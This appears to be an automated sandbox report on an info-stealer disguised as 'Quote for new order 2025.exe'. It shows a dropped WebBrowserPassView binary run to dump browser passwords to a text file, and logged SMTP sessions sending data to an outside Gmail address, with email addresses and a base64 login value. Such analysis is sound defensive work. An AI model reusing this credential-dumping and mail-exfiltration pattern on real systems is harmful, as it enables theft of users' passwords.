                                                                                                                                                      Jan 8, 2025 17:57:03.430016041 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430026054 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430032969 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430037022 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430044889 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430052996 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430056095 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430063963 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430073977 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430082083 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430090904 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430104017 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430111885 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430119991 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430129051 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430131912 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.430135012 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.989347935 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:04.031222105 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:09.739831924 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:09.744774103 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:09.744837999 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:10.357425928 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:10.357681990 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:10.362442017 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:10.577863932 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:10.578221083 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:10.583092928 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:10.798043966 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:10.799595118 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:10.804332018 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.024409056 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.024599075 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.029385090 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.244849920 CET5874974377.245.158.126192.168.2.4
Timestamp                           Source Port  Dest Port  Source IP     Dest IP
Jan 8, 2025 17:56:49.677092075 CET  64952        53         192.168.2.4   1.1.1.1
Jan 8, 2025 17:56:49.796756029 CET  53           64952      1.1.1.1       192.168.2.4
Timestamp                           Source IP     Dest IP   Trans ID  OP Code             Name             Type            Class        DNS over HTTPS
Jan 8, 2025 17:56:49.677092075 CET  192.168.2.4   1.1.1.1   0xdea3    Standard query (0)  mail.lmd.com.tr  A (IP address)  IN (0x0001)  false
Timestamp                           Source IP  Dest IP       Trans ID  Reply Code    Name             CName  Address         Type            Class        DNS over HTTPS
Jan 8, 2025 17:56:49.796756029 CET  1.1.1.1    192.168.2.4   0xdea3    No error (0)  mail.lmd.com.tr         77.245.158.126  A (IP address)  IN (0x0001)  false
Timestamp                           Source Port  Dest Port  Source IP        Dest IP          Commands
Jan 8, 2025 17:56:50.490931034 CET  587          49733      77.245.158.126   192.168.2.4      220 WIN-9PI0701AIBV.home ESMTP MailEnable Service, Version: 10.34-- ready at 01/08/25 19:56:50
Jan 8, 2025 17:56:50.491781950 CET  49733        587        192.168.2.4      77.245.158.126   EHLO 992547
Jan 8, 2025 17:56:50.712296963 CET  587          49733      77.245.158.126   192.168.2.4      250-home [8.46.123.189], this server offers 5 extensions
                                                                                              250-AUTH LOGIN
                                                                                              250-SIZE 40960000
                                                                                              250-HELP
                                                                                              250-AUTH=LOGIN
                                                                                              250 STARTTLS
Jan 8, 2025 17:56:50.713506937 CET  49733        587        192.168.2.4      77.245.158.126   AUTH login eXVrc2VsLmd1bG51ckBsbWQuY29tLnRy
Jan 8, 2025 17:56:50.934197903 CET  587          49733      77.245.158.126   192.168.2.4      334 UGFzc3dvcmQ6
Jan 8, 2025 17:56:51.170416117 CET  587          49733      77.245.158.126   192.168.2.4      235 Authenticated
Jan 8, 2025 17:56:51.173548937 CET  49733        587        192.168.2.4      77.245.158.126   MAIL FROM:<yuksel.gulnur@lmd.com.tr>
Jan 8, 2025 17:56:51.393857956 CET  587          49733      77.245.158.126   192.168.2.4      250 Requested mail action okay, completed
Jan 8, 2025 17:56:51.394082069 CET  49733        587        192.168.2.4      77.245.158.126   RCPT TO:<blueskyhomeshouses@gmail.com>
Jan 8, 2025 17:56:51.687064886 CET  587          49733      77.245.158.126   192.168.2.4      250 Requested mail action okay, completed
Jan 8, 2025 17:56:51.702529907 CET  49733        587        192.168.2.4      77.245.158.126   DATA
Jan 8, 2025 17:56:51.928791046 CET  587          49733      77.245.158.126   192.168.2.4      354 Start mail input; end with <CRLF>.<CRLF>
Jan 8, 2025 17:56:52.115139008 CET  49733        587        192.168.2.4      77.245.158.126   .
Jan 8, 2025 17:56:52.713699102 CET  587          49733      77.245.158.126   192.168.2.4      250 Requested mail action okay, completed
Jan 8, 2025 17:57:01.993386030 CET | 587 | 49736 | 77.245.158.126 | 192.168.2.4 | 220 WIN-9PI0701AIBV.home ESMTP MailEnable Service, Version: 10.34-- ready at 01/08/25 19:57:01
Jan 8, 2025 17:57:01.993741035 CET | 49736 | 587 | 192.168.2.4 | 77.245.158.126 | EHLO 992547
Jan 8, 2025 17:57:02.211127043 CET | 587 | 49736 | 77.245.158.126 | 192.168.2.4 | 250-home [8.46.123.189], this server offers 5 extensions
    250-AUTH LOGIN
    250-SIZE 40960000
    250-HELP
    250-AUTH=LOGIN
    250 STARTTLS
Jan 8, 2025 17:57:02.211616039 CET | 49736 | 587 | 192.168.2.4 | 77.245.158.126 | AUTH login eXVrc2VsLmd1bG51ckBsbWQuY29tLnRy
Jan 8, 2025 17:57:02.429742098 CET | 587 | 49736 | 77.245.158.126 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Jan 8, 2025 17:57:02.647659063 CET | 587 | 49736 | 77.245.158.126 | 192.168.2.4 | 235 Authenticated
Jan 8, 2025 17:57:02.686372995 CET | 49736 | 587 | 192.168.2.4 | 77.245.158.126 | MAIL FROM:<yuksel.gulnur@lmd.com.tr>
Jan 8, 2025 17:57:02.952480078 CET | 587 | 49736 | 77.245.158.126 | 192.168.2.4 | 250 Requested mail action okay, completed
Jan 8, 2025 17:57:02.953524113 CET | 49736 | 587 | 192.168.2.4 | 77.245.158.126 | RCPT TO:<blueskyhomeshouses@gmail.com>
Jan 8, 2025 17:57:03.172651052 CET | 587 | 49736 | 77.245.158.126 | 192.168.2.4 | 250 Requested mail action okay, completed
Jan 8, 2025 17:57:03.172799110 CET | 49736 | 587 | 192.168.2.4 | 77.245.158.126 | DATA
Jan 8, 2025 17:57:03.393277884 CET | 587 | 49736 | 77.245.158.126 | 192.168.2.4 | 354 Start mail input; end with <CRLF>.<CRLF>
Jan 8, 2025 17:57:03.415971994 CET | 49736 | 587 | 192.168.2.4 | 77.245.158.126 | 437vvDd6Yx37VZuP
Jan 8, 2025 17:57:03.989347935 CET | 587 | 49736 | 77.245.158.126 | 192.168.2.4 | 250 Requested mail action okay, completed
Jan 8, 2025 17:57:10.357425928 CET | 587 | 49743 | 77.245.158.126 | 192.168.2.4 | 220 WIN-9PI0701AIBV.home ESMTP MailEnable Service, Version: 10.34-- ready at 01/08/25 19:57:10
Jan 8, 2025 17:57:10.357681990 CET | 49743 | 587 | 192.168.2.4 | 77.245.158.126 | EHLO 992547
Jan 8, 2025 17:57:10.577863932 CET | 587 | 49743 | 77.245.158.126 | 192.168.2.4 | 250-home [8.46.123.189], this server offers 5 extensions
    250-AUTH LOGIN
    250-SIZE 40960000
    250-HELP
    250-AUTH=LOGIN
    250 STARTTLS
Jan 8, 2025 17:57:10.578221083 CET | 49743 | 587 | 192.168.2.4 | 77.245.158.126 | AUTH login eXVrc2VsLmd1bG51ckBsbWQuY29tLnRy
Jan 8, 2025 17:57:10.798043966 CET | 587 | 49743 | 77.245.158.126 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Jan 8, 2025 17:57:11.024409056 CET | 587 | 49743 | 77.245.158.126 | 192.168.2.4 | 235 Authenticated
Jan 8, 2025 17:57:11.024599075 CET | 49743 | 587 | 192.168.2.4 | 77.245.158.126 | MAIL FROM:<yuksel.gulnur@lmd.com.tr>
Jan 8, 2025 17:57:11.244849920 CET | 587 | 49743 | 77.245.158.126 | 192.168.2.4 | 250 Requested mail action okay, completed
Jan 8, 2025 17:57:11.245023966 CET | 49743 | 587 | 192.168.2.4 | 77.245.158.126 | RCPT TO:<blueskyhomeshouses@gmail.com>
Jan 8, 2025 17:57:11.466562986 CET | 587 | 49743 | 77.245.158.126 | 192.168.2.4 | 250 Requested mail action okay, completed
Jan 8, 2025 17:57:11.466749907 CET | 49743 | 587 | 192.168.2.4 | 77.245.158.126 | DATA
Jan 8, 2025 17:57:11.688465118 CET | 587 | 49743 | 77.245.158.126 | 192.168.2.4 | 354 Start mail input; end with <CRLF>.<CRLF>
Jan 8, 2025 17:57:12.301786900 CET | 587 | 49743 | 77.245.158.126 | 192.168.2.4 | 250 Requested mail action okay, completed
Jan 8, 2025 17:58:29.704988003 CET | 49733 | 587 | 192.168.2.4 | 77.245.158.126 | QUIT
Jan 8, 2025 17:58:29.925622940 CET | 587 | 49733 | 77.245.158.126 | 192.168.2.4 | 221 Service closing transmission channel
Jan 8, 2025 17:58:41.377203941 CET | 49736 | 587 | 192.168.2.4 | 77.245.158.126 | QUIT
Jan 8, 2025 17:58:41.594980955 CET | 587 | 49736 | 77.245.158.126 | 192.168.2.4 | 221 Service closing transmission channel
Jan 8, 2025 17:58:49.705101013 CET | 49743 | 587 | 192.168.2.4 | 77.245.158.126 | QUIT
Jan 8, 2025 17:58:49.935431004 CET | 587 | 49743 | 77.245.158.126 | 192.168.2.4 | 221 Service closing transmission channel

Target ID:0
Start time:11:56:46
Start date:08/01/2025
Path:C:\Users\user\Desktop\Quote for new order 2025.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\Quote for new order 2025.exe"
Imagebase:0xe90000
File size:543'744 bytes
MD5 hash:11DE9D1BB135ADB354E26BDAD47037C9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:low
Has exited:false

Target ID:2
Start time:11:56:47
Start date:08/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:11:56:47
Start date:08/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

                                                                                                                                                      Target ID:4
                                                                                                                                                      Start time:11:56:47
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Users\user\Desktop\Chrom.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:.\Chrom.exe /stext .\output.txt
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:402'944 bytes
                                                                                                                                                      MD5 hash:2024EA60DA870A221DB260482117258B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\Desktop\Chrom.exe, Author: Joe Security
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 81%, ReversingLabs
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:5
                                                                                                                                                      Start time:11:56:59
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Users\user\Desktop\Quote for new order 2025.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Quote for new order 2025.exe"
                                                                                                                                                      Imagebase:0x300000
                                                                                                                                                      File size:543'744 bytes
                                                                                                                                                      MD5 hash:11DE9D1BB135ADB354E26BDAD47037C9
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:6
                                                                                                                                                      Start time:11:57:00
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:7
                                                                                                                                                      Start time:11:57:00
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:8
                                                                                                                                                      Start time:11:57:00
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Users\user\Desktop\Chrom.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:.\Chrom.exe /stext .\output.txt
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:402'944 bytes
                                                                                                                                                      MD5 hash:2024EA60DA870A221DB260482117258B
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:11
                                                                                                                                                      Start time:11:57:07
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Users\user\Desktop\Quote for new order 2025.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Quote for new order 2025.exe"
                                                                                                                                                      Imagebase:0x760000
                                                                                                                                                      File size:543'744 bytes
                                                                                                                                                      MD5 hash:11DE9D1BB135ADB354E26BDAD47037C9
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:12
                                                                                                                                                      Start time:11:57:08
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:13
                                                                                                                                                      Start time:11:57:08
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:14
                                                                                                                                                      Start time:11:57:08
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Users\user\Desktop\Chrom.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:.\Chrom.exe /stext .\output.txt
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:402'944 bytes
                                                                                                                                                      MD5 hash:2024EA60DA870A221DB260482117258B
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                      Has exited:true


                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:9.5%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:94.8%
                                                                                                                                                        Signature Coverage:3.4%
                                                                                                                                                        Total number of Nodes:233
                                                                                                                                                        Total number of Limit Nodes:28
                                                                                                                                                        execution_graph: [interactive execution-graph node/edge listing, rendered here as text; Windows API calls appearing as graph nodes: DispatchMessageA, DispatchMessageW, CreateWindowExW, GetFocus, KiUserCallbackDispatcher, GetModuleHandleW, GetCurrentThreadId, GetCurrentProcess, GetCurrentThread, DuplicateHandle, DrawTextExW, PostMessageW, PeekMessageW, WaitMessage, GetSysColorBrush]
Strings
Memory Dump Source
• Source File: 00000000.00000002.3544623404.0000000009E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e00000_Quote for new order 2025.jbxd
Similarity
• API ID:
• String ID: ($($($(
• API String ID: 0-3521244429
• Opcode ID: 29208302a46357d4a7d4762eb5a2309e0e6585441fe353a8aaabd5f6ee7a5fcf
• Instruction ID: 6f8d303b19b67e4d20ed587b5135dfb8ddee071ccfb90dfbb3667c268b07e471
• Opcode Fuzzy Hash: 29208302a46357d4a7d4762eb5a2309e0e6585441fe353a8aaabd5f6ee7a5fcf
• Instruction Fuzzy Hash: 65B38278A55119CFCB64CF64C998AA8B7F1FF49305F1190EAE509AB361DB35AE81CF00

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_Quote for new order 2025.jbxd
Similarity
• API ID:
• String ID: $(&^q$(bq$Hbq
• API String ID: 0-1723523991
• Opcode ID: 0d5e52beb10121a2c488a1eda2b301b9635d42ec53af769b472bb0d2d70a15ac
• Instruction ID: c66e90af570518c5df4703df956866e20dc7c02a6f34ec29990d39fa1b1bbad0
• Opcode Fuzzy Hash: 0d5e52beb10121a2c488a1eda2b301b9635d42ec53af769b472bb0d2d70a15ac
• Instruction Fuzzy Hash: 3091B2F1E002099FDB54EF69C854AAFBAFAEF88314F148429E405EB354DF359901CBA5

Control-flow Graph
APIs
• GetSysColorBrush.USER32(00000000), ref: 09E53F20
Memory Dump Source
• Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
Similarity
• API ID: BrushColor
• String ID:
• API String ID: 464657469-0
• Opcode ID: 55851740f70507f3359d843302c7ef0b149e47b98cb8c6bea06c88f81ad15c77
• Instruction ID: ecda13d4cdf971c67a07479be98ce301be51fd8063d5dfce1f9acd62d645f434
• Opcode Fuzzy Hash: 55851740f70507f3359d843302c7ef0b149e47b98cb8c6bea06c88f81ad15c77
• Instruction Fuzzy Hash: 2A321A35900619CFCB21EF64C944BD9B7B2FF89304F1595E9E80AAB261DB71AE85CF40

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_Quote for new order 2025.jbxd
Similarity
• API ID:
• String ID: fff?
• API String ID: 0-4136771917
• Opcode ID: 00cb0a2a72559dbde2f98804041f0e43d4c54482067a38372a16227eb903f18f
• Instruction ID: f76a38058b75c595fd7cd2d49e3bad48d41909aa61b815d2ef5b70cb52b796c3
• Opcode Fuzzy Hash: 00cb0a2a72559dbde2f98804041f0e43d4c54482067a38372a16227eb903f18f
• Instruction Fuzzy Hash: 60623C32810A1ADFCF11DF50C884AD9B7B2FF9A304F1586D5E9086B165E771AAD5CF80

Control-flow Graph
Memory Dump Source
• Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ffdeed60390af7d3210f45ed46f435b94cc2174ff64220e437c7f15c9fe63fef
• Instruction ID: 3aa34c36f380a46449f2df9b4aa903fb667017620a4ab1addacb7bc2d6723060
• Opcode Fuzzy Hash: ffdeed60390af7d3210f45ed46f435b94cc2174ff64220e437c7f15c9fe63fef
• Instruction Fuzzy Hash: 1ED15C30A00209DFDB14DFA5C948BADBBF1BF44308F159969E816AF2A5DB70ED85CB40
Memory Dump Source
• Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_Quote for new order 2025.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7d93d91bb7751066665780c127af73291966c57f15a47cf9db56a367673e1761
• Instruction ID: 180395c039f84214c4c096c3b4b1d2eda45e5dcc8926a8d96023616a827aebea
• Opcode Fuzzy Hash: 7d93d91bb7751066665780c127af73291966c57f15a47cf9db56a367673e1761
• Instruction Fuzzy Hash: D6525F71A1061ACFCB51EF74C854AE9B7B5FF89304F1485D9E409AB2A1DB71EA82CF40
Memory Dump Source
• Source File: 00000000.00000002.3544623404.0000000009E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e00000_Quote for new order 2025.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e01f5a681dd3bef8aed9a7c59c031e8b2c41a1d8ee0827d47a82a3da8683aec4
• Instruction ID: cb07969d70337660df8c0800d446f7b7a2fc2e93a08a64530b422048b321d39b
• Opcode Fuzzy Hash: e01f5a681dd3bef8aed9a7c59c031e8b2c41a1d8ee0827d47a82a3da8683aec4
• Instruction Fuzzy Hash: 8B029274A01219CFDB68DF64D994BADB7B2FF89304F2090A9D509AB361DB31AD85CF10
Memory Dump Source
• Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_Quote for new order 2025.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e2dc1cd94ab8484c4eadc78de89c25883127bbad9e31ed621ababd013568adcd
• Instruction ID: 4723031a217c6ea3ad716f37a5676d305b20f6f3f03c625ac6401f58d3685912
• Opcode Fuzzy Hash: e2dc1cd94ab8484c4eadc78de89c25883127bbad9e31ed621ababd013568adcd
• Instruction Fuzzy Hash: BFB150B0E0020ACFDB50DFA9D9857ADBBF6BF88318F148129D455EB354EB74A845CB81
Memory Dump Source
• Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_Quote for new order 2025.jbxd
Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2ab09e7781bfe74df715b2b6555af379faa8de864a0046c0488ba98e9f1d9721
                                                                                                                                                        • Instruction ID: 0b7ccbe568a059057fba3d7dbd98effb8f509b21c0ee9c03085a012549025822
                                                                                                                                                        • Opcode Fuzzy Hash: 2ab09e7781bfe74df715b2b6555af379faa8de864a0046c0488ba98e9f1d9721
                                                                                                                                                        • Instruction Fuzzy Hash: FCB16CB0E0020ACFDB50DFA9D88179DBBF6EF88318F14C52AD415EB294EB749845CB81

                                                                                                                                                         Control-flow Graph
                                                                                                                                                         • Rendered graph not reproduced; recovered from its edge list: basic blocks 1557530-155770d, calling GetCurrentProcess, GetCurrentThread, GetCurrentProcess, an internal routine at 155770f, then GetCurrentThreadId
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 015575BE
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 015575FB
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 01557638
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 01557691
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                        • Opcode ID: 9febd8c4392317245ca0b4df50027b5e13e60b8ac99cab0782f9fd23a166c296
                                                                                                                                                        • Instruction ID: f2c24080119c061f76f3236d2f084ac5ff4fc9fe277348dacbd765b2acb65c4c
                                                                                                                                                        • Opcode Fuzzy Hash: 9febd8c4392317245ca0b4df50027b5e13e60b8ac99cab0782f9fd23a166c296
                                                                                                                                                        • Instruction Fuzzy Hash: 9F5164B09003498FDB44DFAAD548BDEBFF1BB49314F20845AD408AB3A1DB34A984CF65

                                                                                                                                                         Control-flow Graph
